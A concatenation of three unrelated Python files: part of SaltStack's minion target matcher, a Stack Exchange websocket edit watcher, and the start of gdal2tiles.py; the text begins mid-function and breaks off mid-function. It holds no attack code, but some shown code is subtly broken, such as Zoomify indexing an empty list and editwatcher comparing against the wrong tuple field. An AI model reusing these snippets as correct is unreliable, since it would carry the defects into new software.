confirm_top(self, match, data, nodegroups=None): ''' Takes the data passed to a top file environment and determines if the data matches this minion ''' matcher = 'compound' if not data: log.error('Received bad data when setting the match from the top ' 'file') return False for item in data: if isinstance(item, dict): if 'match' in item: matcher = item['match'] if hasattr(self, matcher + '_match'): funcname = '{0}_match'.format(matcher) if matcher == 'nodegroup': return getattr(self, funcname)(match, nodegroups) return getattr(self, funcname)(match) else: log.error('Attempting to match with unknown matcher: {0}'.format( matcher )) return False def glob_match(self, tgt): ''' Returns true if the passed glob matches the id ''' if not isinstance(tgt, str): return False return fnmatch.fnmatch(self.opts['id'], tgt) def pcre_match(self, tgt): ''' Returns true if the passed pcre regex matches ''' return bool(re.match(tgt, self.opts['id'])) def list_match(self, tgt): ''' Determines if this host is on the list ''' if isinstance(tgt, string_types): tgt = tgt.split(',') return bool(self.opts['id'] in tgt) def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM): ''' Reads in the grains glob match ''' log.debug('grains target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for grains match ' 'statement from master') return False return salt.utils.subdict_match( self.opts['grains'], tgt, delimiter=delimiter ) def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM): ''' Matches a grain based on regex ''' log.debug('grains pcre target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for grains pcre match ' 'statement from master') return False return salt.utils.subdict_match(self.opts['grains'], tgt, delimiter=delimiter, regex_match=True) def data_match(self, tgt): ''' Match based on the local data store on the minion ''' if self.functions is None: self.functions = salt.loader.minion_mods(self.opts) comps = tgt.split(':') if len(comps) < 2: return False val = self.functions['data.getval'](comps[0]) if val is None: # The value is not defined return False if isinstance(val, list): # We are matching a single component to a single list member for member in val: if fnmatch.fnmatch(str(member).lower(), comps[1].lower()): return True return False if isinstance(val, dict): if comps[1] in val: return True return False return bool(fnmatch.fnmatch( val, comps[1], )) def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM): ''' Reads in the pillar glob match ''' log.debug('pillar target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for pillar match ' 'statement from master') return False return salt.utils.subdict_match( self.opts['pillar'], tgt, delimiter=delimiter ) def pillar_exact_match(self, tgt, delimiter=':'): ''' Reads in the pillar match, no globbing ''' log.debug('pillar target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for pillar match ' 'statement from master') return False return salt.utils.subdict_match(self.opts['pillar'], tgt, delimiter=delimiter, exact_match=True) def ipcidr_match(self, tgt): ''' Matches based on ip address or CIDR notation ''' num_parts = len(tgt.split('/')) if num_parts > 2: # Target is not valid CIDR return False elif num_parts == 2: # Target is CIDR return salt.utils.network.in_subnet( tgt, addrs=self.opts['grains'].get('ipv4', []) ) else: # Target is an IPv4 address import socket try: socket.inet_aton(tgt) except socket.error: # Not a valid IPv4 address return False else: return tgt in self.opts['grains'].get('ipv4', []) def range_match(self, tgt): ''' Matches based on range cluster ''' if HAS_RANGE: range_ = seco.range.Range(self.opts['range_server']) try: return self.opts['grains']['fqdn'] in range_.expand(tgt) except seco.range.RangeException as exc: log.debug('Range exception in compound match: {0}'.format(exc)) return False return False def compound_match(self, tgt): ''' Runs the compound target check ''' if not isinstance(tgt, string_types): log.debug('Compound target received that is not a string') return False ref = {'G': 'grain', 'P': 'grain_pcre', 'I': 'pillar', 'L': 'list', 'S': 'ipcidr', 'E': 'pcre'} if HAS_RANGE: ref['R'] = 'range' results = [] opers = ['and', 'or', 'not', '(', ')'] tokens = tgt.split() for match in tokens: # Try to match tokens from the compound target, first by using # the 'G, X, I, L, S, E' matcher types, then by hostname glob. if '@' in match and match[1] == '@': comps = match.split('@') matcher = ref.get(comps[0]) if not matcher: # If an unknown matcher is called at any time, fail out return False results.append( str( getattr(self, '{0}_match'.format(matcher))( '@'.join(comps[1:]) ) ) ) elif match in opers: # We didn't match a target, so append a boolean operator or # subexpression if results or match in ['(', ')']: if match == 'not': if results[-1] == 'and': pass elif results[-1] == 'or': pass else: results.append('and') results.append(match) else: # seq start with oper, fail if match not in ['(', ')']: return False else: # The match is not explicitly defined, evaluate it as a glob results.append(str(self.glob_match(match))) results = ' '.join(results) try: return eval(results) # pylint: disable=W0123 except Exception: log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results)) return False return False def nodegroup_match(self, tgt, nodegroups): ''' This is a compatibility matcher and is NOT called when using nodegroups for remote execution, but is called when the nodegroups matcher is used in states ''' if tgt in nodegroups: return self.compound_match( salt.utils.minions.nodegroup_comp(tgt, nodegroups) ) return False class ProxyMinion(Minion): ''' This class instantiates a 'proxy' minion--a minion that does not manipulate the host it runs on, but instead manipulates a device that cannot run a minion. ''' def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231 ''' Pass in the options dict ''' self._running = None # Warn if ZMQ < 3.2 if HAS_ZMQ: try: zmq_version_info = zmq.zmq_version_info() except AttributeError: # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to # using zmq.zmq_version() and build a version info tuple. zmq_version_info = tuple( [int(x) for x in zmq.zmq_version().split('.')] ) if zmq_version_info < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) # Late setup the of the opts grains, so we can log from the grains # module # print opts['proxymodule'] fq_proxyname = 'proxy.'+opts['proxy']['proxytype'] self.proxymodule = salt.loader.proxy(opts, fq_proxyname) opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy']) opts['id'] = opts['proxyobject'].id(opts) opts.update(resolve_dns(opts)) self.opts = opts self.authenticate(timeout, safe) self.functions, self.returners, self.function_errors = self._load_modules() self.opts['pillar'] = salt.pillar.get_pillar( opts, opts['grains'], opts['id'], opts['environment'], funcs=self.functions ).compile_pillar() self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() self.matcher = Matcher(self.opts, self.functions) self.proc_dir = get_proc_dir(opts['cachedir']) self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners) self.grains_cache = self.opts['grains'] # self._running = True def _prep_mod_opts(self): ''' Returns a copy of the opts with key bits stripped out ''' return super(ProxyMinion, self)._prep_mod_opts() def _load_modules(self, force_refresh=False): ''' Return the functions and the returners loaded up from the loader module ''' return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
editwatcher.py
# coding=utf-8 import json import os.path import requests import time import threading # noinspection PyPackageRequirements import websocket # noinspection PyPackageRequirements from bs4 import BeautifulSoup from urllib.parse import urlparse import chatcommunicate import metasmoke from globalvars import GlobalVars import datahandling from helpers import log, add_to_global_bodyfetcher_queue_in_new_thread from parsing import fetch_post_id_and_site_from_url, to_protocol_relative from tasks import Tasks PICKLE_FILENAME = "editActions.p" DEFAULT_TIMEOUT = 10 * 60 # 10 minutes # noinspection PyClassHasNoInit,PyBroadException,PyMethodParameters class EditWatcher: def __init__(self): if GlobalVars.no_edit_watcher: self.socket = None return # posts is a dict with the WebSocket action as keys {site_id}-question-{question_id} as keys # with each value being: (site_id, hostname, question_id, max_time) self.posts = {} self.posts_lock = threading.Lock() self.save_handle = None self.save_handle_lock = threading.Lock() try: self.socket = websocket.create_connection("wss://qa.sockets.stackexchange.com/") except websocket.WebSocketException: self.socket = None log('error', 'EditWatcher failed to create a websocket connection') if datahandling.has_pickle(PICKLE_FILENAME): pickle_data = datahandling.load_pickle(PICKLE_FILENAME) now = time.time() new_posts = {action: value for action, value in pickle_data if value[-1] > now} with self.posts_lock: self.posts = new_posts for action in new_posts.keys(): Tasks.do(self._subscribe, action) self._schedule_save() threading.Thread(name="edit watcher", target=self._start, daemon=True).start() def _start(self): while True: msg = self.socket.recv() if msg: msg = json.loads(msg) action = msg["action"] if action == "hb": self.socket.send("hb") else: data = json.loads(msg["data"]) now = time.time() with self.posts_lock: site_id, hostname, question_id, max_time = self.posts.get(action, (None, None, None, now)) if site_id and max_time <= now: del self.posts[action] Tasks.do(self._unsubscribe, action) if max_time > now and data["a"] == "post-edit": print('POST-EDIT: Scheduling bodyfetcher for: hostname:', hostname, ':: question_id:', question_id) add_to_global_bodyfetcher_queue_in_new_thread(hostname, question_id, False) def subscribe(self, post_url=None, hostname=None, site_id=None, question_id=None, pickle=True, timeout=DEFAULT_TIMEOUT, max_time=None, from_time=None): if GlobalVars.no_edit_watcher: return if post_url and not ((hostname or site_id) and question_id): post_id, hostname, post_type = fetch_post_id_and_site_from_url(post_url) if post_type == "answer": question_id = datahandling.get_post_site_id_link((post_id, hostname, post_type)) if question_id is None: log("warning", "Unable to get question ID when subscribing to: hostname: " "{} :: post ID:{} when subscribing to {}".format(hostname, post_id, post_url)) return else: question_id = post_id if post_type != "question": log("warning", "tried to edit-watch non-question: hostname: " "{} :: post ID:{} when subscribing to {}".format(hostname, question_id, post_url)) return if not site_id or not hostname: with GlobalVars.site_id_dict_lock: if not site_id and hostname: site_id = GlobalVars.site_id_dict.get(hostname) if site_id and not hostname: hostname = GlobalVars.site_id_dict_by_id.get(site_id) if not site_id or not hostname: log("warning", "unable to determine a valid site ID or hostname when subscribing to question ID " "{}:: site_id:{}:: hostname:{}:: post_url:{}".format(question_id, site_id, hostname, post_url)) return question_ids = question_id if type(question_ids) != list: question_ids = [question_id] now = time.time() if from_time: now = from_time if not max_time: max_time = now + timeout updated = None to_subscribe = [] with self.posts_lock: for question_id in question_ids: action = "{}-question-{}".format(site_id, question_id) if action not in self.posts: self.posts[action] = (site_id, hostname, question_id, max_time) to_subscribe.append(action) else: old_max_time = self.posts[action][2] if max_time > old_max_time: self.posts[action] = (site_id, hostname, question_id, max_time) elif updated is None: updated = False for action in to_subscribe: print('scheduling subscription to action:', action) Tasks.do(self._subscribe, action) if updated and pickle: self._schedule_save() def _subscribe(self, action): if self.socket: print('subscribing to action:', action) try: self.socket.send(action) except websocket.WebSocketException: log('error', 'EditWatcher failed to subscribe to {}'.format(action)) else: log('warning', 'EditWatcher tried to subscribe to {}, but no WebSocket available.'.format(action)) def _schedule_save(self): with self.save_handle_lock: if self.save_handle: self.save_handle.cancel() save_handle = Tasks.do(self._save) def _save(self): with self.posts_lock: copy = self.posts.copy() datahandling.dump_pickle(PICKLE_FILENAME, copy) def _unsubscribe(self, action): if self.socket: print('UNsubscribing to action:', action) try: self.socket.send("-" + action) except websocket.WebSocketException: log('error', 'EditWatcher failed to unsubscribe to {}'.format(action)) else: log('warning', 'EditWatcher tried to unsubscribe to {}, but no WebSocket available.'.format(action))
gdal2tiles.py
#!/home/wilsonsf/environments/my_env/bin/python3 # -*- coding: utf-8 -*- # ****************************************************************************** # $Id$ # # Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/) # Support: BRGM (http://www.brgm.fr) # Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory. # - generate Google Earth metadata (KML SuperOverlay) # - generate simple HTML viewer based on Google Maps and OpenLayers # - support of global tiles (Spherical Mercator) for compatibility # with interactive web maps a la Google Maps # Author: Klokan Petr Pridal, klokan at klokan dot cz # Web: http://www.klokan.cz/projects/gdal2tiles/ # GUI: http://www.maptiler.org/ # ############################################################################### # Copyright (c) 2008, Klokan Petr Pridal # Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # ****************************************************************************** from __future__ import print_function, division import math from multiprocessing import Pipe, Pool, Process, Manager import os import tempfile import threading import shutil import sys from uuid import uuid4 from xml.etree import ElementTree from osgeo import gdal from osgeo import osr try: from PIL import Image import numpy import osgeo.gdal_array as gdalarray numpy_available = True except ImportError: # 'antialias' resampling is not available numpy_available = False __version__ = "$Id$" resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias') profile_list = ('mercator', 'geodetic', 'raster') webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none') threadLocal = threading.local() # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = """ globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles used on the web. It contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:3857) for Google Maps, Yahoo Maps, Bing Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by Klokan Petr Pridal on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In case you use this class in your product, translate it to another language or find it useful for your project please let me know. My email: klokan at klokan dot cz. I would like to know where it was used. Class is available under the open-source GDAL license (www.gdal.org). """ MAXZOOMLEVEL = 32 class GlobalMercator(object): r""" TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:3857. Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay them on top of base maps of those web mapping applications. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in meters XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:387 .----. --------- -- TMS / \ <-> | | <-> /----/ <-> Google \ / | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate extent of Earth in EPSG:3857? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in meters, which is 40 thousand kilometers, the coordinate origin is in the middle of extent. In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom level constants (pixels/meter) for pyramid with EPSG:3857? whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution is always divided by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile name convention? The tile raster itself is the same (equal extent, projection, pixel size), there is just different identification of the same raster tile. Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ. Google placed the origin [0,0] to the top-left corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yes? Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the web clients like Google Maps are projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if the were on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use the spherical form of projection, not the ellipsoidal form. Since the projection is used only for map display, and not for displaying numeric coordinates, we don't need the extra precision of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion in the Y direction, which is not visually noticeable. How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:3857'. For other GIS programs check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is designated as EPSG:3857. WKT definition is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPSG:3857: PROJCS["Google Maps Global Mercator", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], PRIMEM["Greenwich",0], UNIT["degree",0.0174532925199433], AUTHORITY["EPSG","4326"]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",0], PARAMETER["scale_factor",1], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1, AUTHORITY["EPSG","9001"]]] """ def __init__(self, tile_size=256): "Initialize the TMS Global Mercator pyramid" self.tile_size = tile_size self.initialResolution = 2 * math.pi * 6378137 / self.tile_size # 156543.03392804062 for tile_size 256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon): "Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857" mx = lon * self.originShift / 180.0 my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0) my = my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my): "Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum" lon = (mx / self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, py, zoom): "Converts pixel coordinates in given zoom level of pyramid to EPSG:3857" res = self.Resolution(zoom) mx = px * res - self.originShift my = py * res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): "Converts EPSG:3857 to pyramid pixel coordinates in given zoom level" res = self.Resolution(zoom) px = (mx + self.originShift) / res py = (my + self.originShift) / res return px, py def PixelsToTile(self, px, py): "Returns a tile covering region in given pixel coordinates" tx = int(math.ceil(px / float(self.tile_size)) - 1) ty = int(math.ceil(py / float(self.tile_size)) - 1) return tx, ty def PixelsToRaster(self, px, py, zoom): "Move the origin of pixel coordinates to top-left corner" mapSize = self.tile_size << zoom return px, mapSize - py def MetersToTile(self, mx, my, zoom): "Returns tile for given mercator coordinates" px, py = self.MetersToPixels(mx, my, zoom) return self.PixelsToTile(px, py) def TileBounds(self, tx, ty, zoom): "Returns bounds of the given tile in EPSG:3857 coordinates" minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom) maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom) return (minx, miny, maxx, maxy) def TileLatLonBounds(self, tx, ty, zoom): "Returns bounds of the given tile in latitude/longitude using WGS84 datum" bounds = self.TileBounds(tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return (minLat, minLon, maxLat, maxLon) def Resolution(self, zoom): "Resolution (meters/pixel) for given zoom level (measured at Equator)" # return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize): "Maximal scaledown zoom of the pyramid closest to the pixelSize." for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): return max(0, i - 1) # We don't want to scale up return MAXZOOMLEVEL - 1 def GoogleTile(self, tx, ty, zoom): "Converts TMS tile coordinates to Google Tile coordinates" # coordinate origin is moved from bottom-left to top-left corner of the extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom): "Converts TMS tile coordinates to Microsoft QuadTree" quadKey = "" ty = (2**zoom - 1) - ty for i in range(zoom, 0, -1): digit = 0 mask = 1 << (i - 1) if (tx & mask) != 0: digit += 1 if (ty & mask) != 0: digit += 2 quadKey += str(digit) return quadKey class GlobalGeodetic(object): r""" TMS Global Geodetic Profile --------------------------- Functions necessary for generation of global tiles in Plate Carre projection, EPSG:4326, "unprojected profile". Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters) and you can overlay the tiles on top of OpenLayers base map. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global Geodetic tiles? Global Geodetic tiles are using geodetic coordinates (latitude,longitude) directly as planar coordinates XY (it is also called Unprojected or Plate Carre). We need only scaling to pixel pyramid and cutting to tiles. Pyramid has on top level two tiles, so it is not square but rectangle. Area [-180,-90,180,90] is scaled to 512x256 pixels. TMS has coordinate origin (for pixels and tiles) in bottom-left corner. Rasters are in EPSG:4326 and therefore are compatible with Google Earth. LatLon <-> Pixels <-> Tiles WGS84 coordinates Pixels in pyramid Tiles in pyramid lat/lon XY pixels Z zoom XYZ from TMS EPSG:4326 .----. ---- / \ <-> /--------/ <-> TMS \ / /--------------/ ----- /--------------------/ WMS, KML Web Clients, Google Earth TileMapService """ def __init__(self, tmscompatible, tile_size=256): self.tile_size = tile_size if tmscompatible is not None: # Defaults the resolution factor to 0.703125 (2 tiles @ level 0) # Adhers to OSGeo TMS spec # http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic self.resFact = 180.0 / self.tile_size else: # Defaults the resolution factor to 1.40625 (1 tile @ level 0) # Adheres OpenLayers, MapProxy, etc default resolution for WMTS self.resFact = 360.0 / self.tile_size def LonLatToPixels(self, lon, lat, zoom): "Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid" res = self.resFact / 2**zoom px = (180 + lon) / res py = (90 + lat) / res return px, py def PixelsToTile(self, px, py): "Returns coordinates of the tile covering region in pixel coordinates" tx = int(math.ceil(px / float(self.tile_size)) - 1) ty = int(math.ceil(py / float(self.tile_size)) - 1) return tx, ty def LonLatToTile(self, lon, lat, zoom): "Returns the tile for zoom which covers given lon/lat coordinates" px, py = self.LonLatToPixels(lon, lat, zoom) return self.PixelsToTile(px, py) def Resolution(self, zoom): "Resolution (arc/pixel) for given zoom level (measured at Equator)" return self.resFact / 2**zoom def ZoomForPixelSize(self, pixelSize): "Maximal scaledown zoom of the pyramid closest to the pixelSize." for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): return max(0, i - 1) # We don't want to scale up return MAXZOOMLEVEL - 1 def TileBounds(self, tx, ty, zoom): "Returns bounds of the given tile" res = self.resFact / 2**zoom return ( tx * self.tile_size * res - 180, ty * self.tile_size * res - 90, (tx + 1) * self.tile_size * res - 180, (ty + 1) * self.tile_size * res - 90 ) def TileLatLonBounds(self, tx, ty, zoom): "Returns bounds of the given tile in the SWNE form" b = self.TileBounds(tx, ty, zoom) return (b[1], b[0], b[3], b[2]) class Zoomify(object): """ Tiles compatible with the Zoomify viewer ---------------------------------------- """ def __init__(self, width, height, tile_size=256, tileformat='jpg'): """Initialization of the Zoomify tile tree""" self.tile_size = tile_size self.tileformat = tileformat imagesize = (width, height) tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size)) # Size (in tiles) for each tier of pyramid. self.tierSizeInTiles = [] self.tierSizeInTiles.append(tiles) # Image size in pixels for each pyramid tierself self.tierImageSize = [] self.tierImageSize.append(imagesize) while (imagesize[0] > tile_size or imagesize[1] > tile_size): imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2)) tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size)) self.tierSizeInTiles.append(tiles) self.tierImageSize.append(imagesize) self.tierSizeInTiles.reverse() self.tierImageSize.reverse() # Depth of the Zoomify pyramid, number of tiers (zoom levels) self.numberOfTiers = len(self.tierSizeInTiles) # Number of tiles up to the given tier of pyramid. self.tileCountUpToTier = [] self.tileCountUpToTier[0] = 0 for i in range(1, self.numberOfTiers + 1): self.tileCountUpToTier.append( self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] + self.tileCountUpToTier[i - 1] ) def tilefilename(self, x, y, z): """Returns filename for tile with given coordinates""" tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z] return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256), "%s-%s-%s.%s" % (z, x, y, self.tileformat)) class GDALError(Exception): pass def exit_with_error(message, details=""): # Message printing and exit code kept from the way it worked using the OptionParser (in case # someone parses the error output) sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n") sys.stderr.write("gdal2tiles.py: error: %s\n" % message) if details: sys.stderr.write("\n\n%s\n" % details) sys.exit(2) def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args): """ Template for the KML. Returns filled string. """ if not children: children = [] args['tx'], args['ty'], args['tz'] = tx, ty, tz args['tileformat'] = tileext if 'tile_size' not in args: args['tile_size'] = tile_size if 'minlodpixels' not in args: args['minlodpixels'] = int(args['tile_size'] / 2) if 'maxlodpixels' not in args: args['maxlodpixels'] = int(args['tile_size'] * 8) if children == []: args['maxlodpixels'] = -1 if tx is None: tilekml = False args['title'] = options.title else: tilekml = True args['title'] = "%d/%d/%d.kml" % (tz, tx, ty) args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz) if tx == 0: args['drawOrder'] = 2 * tz + 1 elif tx is not None: args['drawOrder'] = 2 * tz else: args['drawOrder'] = 0 url = options.url if not url: if tilekml: url = "../../" else: url = "" s = """<?xml version="1.0" encoding="utf-8"?> <kml xmlns="http://www.opengis.net/kml/2.2"> <Document> <name>%(title)s</name> <description></description> <Style> <ListStyle id="hideChildren"> <listItemType>checkHideChildren</listItemType> </ListStyle> </Style>""" % args if tilekml: s += """ <Region> <LatLonAltBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonAltBox> <Lod> <minLodPixels>%(minlodpixels)d</minLodPixels> <maxLodPixels>%(maxlodpixels)d</maxLodPixels> </Lod> </Region> <GroundOverlay> <drawOrder>%(drawOrder)d</drawOrder> <Icon> <href>%(ty)d.%(tileformat)s</href> </Icon> <LatLonBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonBox> </GroundOverlay> """ % args for cx, cy, cz in children: csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz) s += """ <NetworkLink> <name>%d/%d/%d.%s</name> <Region> <LatLonAltBox> <north>%.14f</north> <south>%.14f</south> <east>%.14f</east> <west>%.14f</west> </LatLonAltBox> <Lod> <minLodPixels>%d</minLodPixels> <maxLodPixels>-1</maxLodPixels> </Lod> </Region> <Link> <href>%s%d/%d/%d.kml</href> <viewRefreshMode>onRegion</viewRefreshMode> <viewFormat/> </Link> </NetworkLink> """ % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest, args['minlodpixels'], url, cz, cx, cy) s += """ </Document> </kml> """ return s def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''): """Scales down query dataset to the tile dataset""" querysize = dsquery.RasterXSize tile_size = dstile.RasterXSize tilebands = dstile.RasterCount if options.resampling == 'average': # Function: gdal.RegenerateOverview() for i in range(1, tilebands + 1): # Black border around NODATA res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i), 'average') if res != 0: exit_with_error("RegenerateOverview() failed on %s, error %d" % ( tilefilename, res)) elif options.resampling == 'antialias' and numpy_available: # Scaling by PIL (Python Imaging Library) - improved Lanczos array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8) for i in range(tilebands): array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1), 0, 0, querysize, querysize) im = Image.fromarray(array, 'RGBA') # Always four bands im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS) if os.path.exists(tilefilename): im0 = Image.open(tilefilename) im1 = Image.composite(im1, im0, im1) im1.save(tilefilename, tiledriver) else: if options.resampling == 'near': gdal_resampling = gdal.GRA_NearestNeighbour elif options.resampling == 'bilinear': gdal_resampling = gdal.GRA_Bilinear elif options.resampling == 'cubic': gdal_resampling = gdal.GRA_Cubic elif options.resampling == 'cubicspline': gdal_resampling = gdal.GRA_CubicSpline elif options.resampling == 'lanczos': gdal_resampling = gdal.GRA_Lanczos # Other algorithms are implemented by gdal.ReprojectImage(). dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0, tile_size / float(querysize))) dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0)) res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling) if res != 0: exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res)) def setup_no_data_values(input_dataset, options): """ Extract the NODATA values from the dataset or use the passed arguments as override if any """ in_nodata = [] if options.srcnodata: nds = list(map(float, options.srcnodata.split(','))) if len(nds) < input_dataset.RasterCount: in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount] else: in_nodata = nds else: for i in range(1, input_dataset.RasterCount + 1): raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue() if raster_no_data is not None: in_nodata.append(raster_no_data) if options.verbose: print("NODATA: %s" % in_nodata) return in_nodata def setup_input_srs(input_dataset, options): """ Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a WKT representation Uses in priority the one passed in the command line arguments. If None, tries to extract them from the input dataset """ input_srs = None input_srs_wkt = None if options.s_srs: input_srs = osr.SpatialReference() 